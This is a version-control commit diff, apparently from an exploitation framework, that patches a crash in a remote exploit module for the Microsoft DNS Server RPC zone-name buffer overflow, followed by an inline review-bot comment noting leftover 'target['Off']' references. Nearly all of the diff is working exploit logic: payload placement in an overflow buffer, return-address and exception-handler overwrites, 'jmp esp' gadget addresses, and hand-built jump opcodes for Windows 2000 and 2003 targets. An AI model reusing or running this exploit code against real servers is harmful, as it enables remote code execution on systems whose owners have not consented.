Fix the crash that occurred when a specific target is selected

git-svn-id: file:///home/svn/framework3/trunk@5016 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-07-03 04:21:44 +00:00
parent d0b15d3d72
commit fb7291877d
1 changed files with 16 additions and 11 deletions


@ -124,6 +124,9 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
print_status("Discovered Microsoft DNS Server RPC service on port #{dport}") print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
end end
mytarget = nil
if (target.name =~ /Automatic/) if (target.name =~ /Automatic/)
# scheduler service is only available on 2k3 SP0 and 2000 # scheduler service is only available on 2k3 SP0 and 2000
@ -131,24 +134,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
if (not schedport) if (not schedport)
print_status("Detected a Windows 2003 SP1-SP2 target...") print_status("Detected a Windows 2003 SP1-SP2 target...")
target = gettarget('2003SP12') mytarget = gettarget('2003SP12')
else else
# only available on 2003 SP0 # only available on 2003 SP0
schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp') schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp')
if (not schedport) if (not schedport)
print_status("Detected a Windows 2000 SP0-SP4 target...") print_status("Detected a Windows 2000 SP0-SP4 target...")
target = gettarget('2000') mytarget = gettarget('2000')
else else
print_status("Detected a Windows 2003 SP0 target...") print_status("Detected a Windows 2003 SP0 target...")
target = gettarget('2003SP0') mytarget = gettarget('2003SP0')
end end
end end
if (not target) if (not mytarget)
print_status("There is no available target for this locale") print_status("There is no available target for this locale")
return return
end end
else
mytarget = target
end end
@ -170,7 +175,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
txt[0, payload.encoded.length] = payload.encoded txt[0, payload.encoded.length] = payload.encoded
off = target['Off'] off = target['Off']
txt[ off ] = [target.ret].pack('V') txt[ off ] = [mytarget.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06" txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
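Review bot: The context line `off = target['Off']` just above the rewritten `txt[ off ] = [mytarget.ret].pack('V')` still reads the user-selected target, while every other reference in this hunk was moved to `mytarget`; the same `off = target['Off']` is left unchanged in the next hunk, just before the `__except_handler3` write, whereas the 2003SP12 branch in the last hunk does switch to `mytarget['Off']`. With the Automatic target selected, `target` is the Automatic entry rather than the detected one, so unless that entry carries its own 'Off' value the index is nil and `txt[ off ]` raises, which looks like the same class of crash this commit fixes for explicitly chosen targets. Both lines should read `off = mytarget['Off']` so that offset and return address come from the same target entry. The enclosing method and the branch conditions that select these code paths begin outside the visible hunks.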
@ -178,11 +183,11 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
txt[0, payload.encoded.length] = payload.encoded txt[0, payload.encoded.length] = payload.encoded
off = target['Off'] off = target['Off']
txt[ off ] = [target['Rets'][0]].pack('V') # __except_handler3 txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
txt[ off - 4, 2] = "\xeb\x16" txt[ off - 4, 2] = "\xeb\x16"
# addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9) # addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9)
addr = target['Rets'][1] - 4 addr = mytarget['Rets'][1] - 4
addr1 = addr / 2 addr1 = addr / 2
addr2 = addr1 + addr % 2 addr2 = addr1 + addr % 2
addr1 = addr1 + (addr2 % 12) addr1 = addr1 + (addr2 % 12)
@ -200,12 +205,12 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
# 0x77f443d5 leave ; mov esp, ebp # 0x77f443d5 leave ; mov esp, ebp
# 0x77f443d6 retn ; ret # 0x77f443d6 retn ; ret
txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V') # jmp esp
txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
elsif (target['OS'] =~ /2003SP12/) elsif (mytarget['OS'] =~ /2003SP12/)
off = target['Off'] off = mytarget['Off']
ib = target['IB'] ib = mytarget['IB']
txt[ off ] = [ib + 0x2566].pack('V') txt[ off ] = [ib + 0x2566].pack('V')